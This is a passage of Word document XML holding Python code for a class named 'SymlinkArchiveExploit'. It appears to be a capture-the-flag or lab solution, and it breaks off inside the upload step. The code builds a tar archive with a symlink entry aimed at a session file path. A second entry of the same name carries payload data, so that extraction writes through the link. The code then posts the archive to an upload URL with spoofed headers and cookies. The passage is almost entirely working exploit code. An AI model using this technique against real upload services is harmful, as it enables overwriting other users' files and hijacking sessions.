              <w:t>class SymlinkArchiveExploit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608A74DA" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    def __init__(self, session_id: str, payload_data: str, archive_name: str):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB1AA29" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        self.session_id = session_id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD9AE00" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        self.payload_data = payload_data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F51E4D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        self.archive_name = archive_name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379843D1" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        self.symlink_name = session_id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="676E8C94" w14:textId="39EAD7A4" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        self.target_path = </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"/tmp/sessions/</w:t>
            </w:r>
            <w:r w:rsidR="006B2E0C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>abcdef</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/{</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>session_id</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1713F9F0" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74681C70" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    def create_malicious_archive(self) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5917F3FD" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06F82221" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            with tarfile.open(self.archive_name, </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"w"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>) as tar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78421112" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                symlink_info = tarfile.TarInfo(name=self.symlink_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1995CB83" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                symlink_info.type = tarfile.SYMTYPE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AD30B1" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                symlink_info.linkname = self.target_path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6931B071" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                tar.addfile(symlink_info)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="324ADD75" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D1E9563" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                payload_info = tarfile.TarInfo(name=self.symlink_name)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1955E689" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                payload_info.size = len(self.payload_data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F79DB15" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                tar.addfile(payload_info, io.BytesIO(self.payload_data.encode(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'utf-8'</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D668C7" w14:textId="777CEB77" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"Created archive {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>self.archive_name</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>} targeting {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>self.target_path</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7E8451" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            return True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA6F217" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA22DF4" w14:textId="646087A9" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f"Error creating archive: {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>str(e)</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37C9BC10" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            return False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51408428" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="331AE446" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">    def upload_archive(self, upload_url: str) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29B420EE" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        headers = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E601995" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Host"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"127.0.0.1:1337"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C26223" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"User-Agent"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Mozilla/5.0"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073BC00B" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Accept"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"*/*"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A432BFB" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Connection"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"keep-alive"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFB08B0" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42890CDF" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EBFA50D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        cookies = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392B95A0" w14:textId="46FB0E6F" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"username"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="006546FE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>abcdef</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5817F3EA" w14:textId="778EDAD7" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"session"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="006546FE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>abcdef</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F53B37" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FED7357" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="136E9997" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1506E630" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">            with open(self.archive_name, </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'rb'</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B978FC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                files = {</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'archive'</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: (self.archive_name, f, </w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'application/x-tar'</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79730486" w14:textId="77777777" w:rsidR="006546FE" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                response = requests.post(upload_url, files=files, headers=headers, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A632235" w14:textId="7DB08F36" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>cookies=cookies)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="682409BE" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4996AA98" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                if response.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="341B6AA0" w14:textId="5A8893BB" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">                    print(</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Upload successful"</w:t>
            </w:r>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
